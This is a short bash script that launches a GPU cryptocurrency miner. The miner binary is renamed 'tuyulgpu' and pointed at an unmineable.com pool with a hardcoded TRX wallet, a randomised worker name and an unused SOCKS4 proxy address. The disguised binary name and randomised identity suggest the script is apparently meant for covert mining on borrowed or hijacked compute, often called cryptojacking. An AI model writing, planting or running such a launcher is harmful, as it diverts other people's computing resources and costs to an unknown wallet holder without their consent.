#!/bin/bash
POOL=ethash.unmineable.com:3333
WALLET=TRX:TGEThftjLnxmSJWhNzbgYpAU7MXVZho822
WORKER=$(echo $(shuf -i 1-70 -n 1)-ristretto)
chmod +x tuyulgpu
PROXY=socks4://198.50.177.44:44699
./tuyulgpu --algo ETHASH --pool $POOL --user $WALLET.$WORKER
